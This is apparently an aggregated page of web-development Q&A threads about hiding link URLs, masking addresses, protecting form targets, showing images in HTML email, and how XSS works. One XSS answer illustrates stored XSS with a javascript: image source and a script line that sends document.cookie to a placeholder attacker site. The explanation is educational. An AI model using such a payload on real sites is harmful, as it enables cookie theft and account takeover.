html link: hide href from user - html

In an HTML file that is sent to someone by e-mail, is it possible to prevent the receiver from inspecting the href of a link in that HTML file?
I need to prevent the user from seeing/copying the url.

You can't. It is entirely impossible.
The email client and the browser are both entirely under the control of the user (so you can't give them a URL without also giving it to the user).
Tricks might obfuscate the URL, but decoding it is trivial.

Related

Add protocol to inputted URL in a user-friendly way

I'm trying to make a text input for an external link so that I can make an anchor tag that can navigate somewhere to.
URL WITHOUT protocol
URL WITH protocol
But when people naturally type 'www.bing.com', I get a URL without protocol, which works like navigating on the current site.
I can make a regex pattern asking the user to input an absolute link (prefixed with protocol, such as 'http://....' or 'https://...'), but is there a more user-friendly way to fix the problem?

XSS: Rewrite the content of the HTML page?

Regarding XSS, OWASP states (intro paragraph):
These scripts can even rewrite the content of the HTML page
As a user, I cannot rewrite the contents of facebook.com (other than wall posts, comments, and so on). That would require me to permanently alter their html files, which clearly no user without specific server access can do.
When I cannot do it as a user, how can possibly a maliciously injected script from facebook.com, executed by my browser, rewrite the contents of facebook.com?
As a user, I cannot rewrite the contents of facebook.com
You could if Facebook didn't protect well against XSS. Sites that don't escape user-generated text for usage in the context of HTML are vulnerable to having arbitrary script injected into the page. Your Facebook post could contain a <script> tag, for example.
That would require me to permanently alter their html files, which clearly no user without specific server access can do.
No, you could simply modify the page client-side once your malicious script is loaded. No need to actually modify the original page to have the effect of wiping out the page. For example:
document.body.innerHTML = '';
Let me give some example. Let's imagine Facebook lets its users to save a link to externally hosted avatar at user's profile. And this avatar is shown near user's nickname. Also let's imagine that Facebook does not protect itself against XSS (it really does, but we need this assumption).
Then the attacker can use such text instead of avatar link:
javascript:alert('You are hacked')
Facebook's HTML code displaying avatar may look as:
<img src="javascript:alert('You are hacked')"></img>
Then attacker will see that alert when he opens his profile. Doesn't look very dangerous, does it?
But take care: Facebook has a news feed. Let the attacker write some post - and all his friends will see the alert on their newsfeed page.
And to finalize: instead of alert the attacker will be able to get user's Facebook cookies and send them to attacker's site:
<script>window.location = 'attackerssite.com?cookie=' + document.cookie</script>
And then he'll collect victim's cookies from his server's access log. Now it is a real hazard, do you agree?
Note. Here I described stored XSS: it is probably the most dangerous type of XSS that can affect many users at once. The other types of XSS (described in other answers to this question) may affect current user - but that doesn't mean they are not dangerous: for example they can steal user's cookies as well.

How to mask a URL via HTML or .htaccess

I am setting up a website that I want no one to know the URL for. For example, I send them a link that actually goes to the page, but the URL in the bar at the top has a completely different URL that I don't own. I'm not sure if this can be done in PHP, HTML, or the .htaccess file.
This is not possible, unless
you control the systems of the visitors (then you could, for example, change their DNS servers), or
you find and exploit a bug in the browser/system.
You can make a link anchor text look like it leads to a specific domain not under your control, but the real URL will be used in any case. Example: http://wikipedia.org/.

Hiding ASP file name from HTML

I have an HTML form:
<form id="form" action="Secret.asp" method="POST">
This form sends data from my website visitor to a database.
I want to hide it so that whoever sees my HTML will not be able to send data to my ASP file.
Or maybe there is another way to block an ASP file from anyone but the HTML file?
I suppose you could set up a default document on a virtual directory, and set the action to that. Then your user wouldn't see the page name, but the form data would still get posted.
The bigger question is... why do you want to do this? If it's a matter of security through obscurity, this is the wrong approach. Whatever page receives the form data should not trust it at all, and should sanitize anything going into a database anyway.
No.
If you want browsers to be able to send data to a URL, then you have to tell them what that URL is.
Anything you tell a browser, you tell to the user in control of that browser.
No matter what you do, anyone can see their own HTTP requests going out to your server.
If you press F12 on Chrome or Firefox you can see your incoming and outgoing traffic, so it's useless to try and do anything about it.
If you want to secure something, that's not the way to go about it.

ensuring HTML emails always show images

I have an email sent out in in my application, and in the HTML of that email, i have an <img> tag which is an image and a link.
The problem is that in most cases the image doesn't load in emails, unless you enable the viewing of embedded images.
That image is an important part of the email. Is there any way I can replace the image tag with something else which always loads in emails? The desire is that users don't have to explicitly click on show pictures to see it.
Absolutely... you can embed the image as an attachment, and then use the CID header in the mail MIME to reference it (instead of a URL to a web resource)
There is no way to guarantee that an image will be displayed without explicit permission of the user. That would circumvent the whole concept if it were possible. The idea is to protect the user from exposure to undesirable content. In the event you were to find some hack way around it, it would be considered just that, and could get you blacklisted once the hack is discovered.
Is the img tag just a reference to an external image that's hosted somewhere? You could try adding it to the email as an embedded resource and see if that helps. Some mail clients may still ask permission before displaying it, though. But it should get more of the target audience.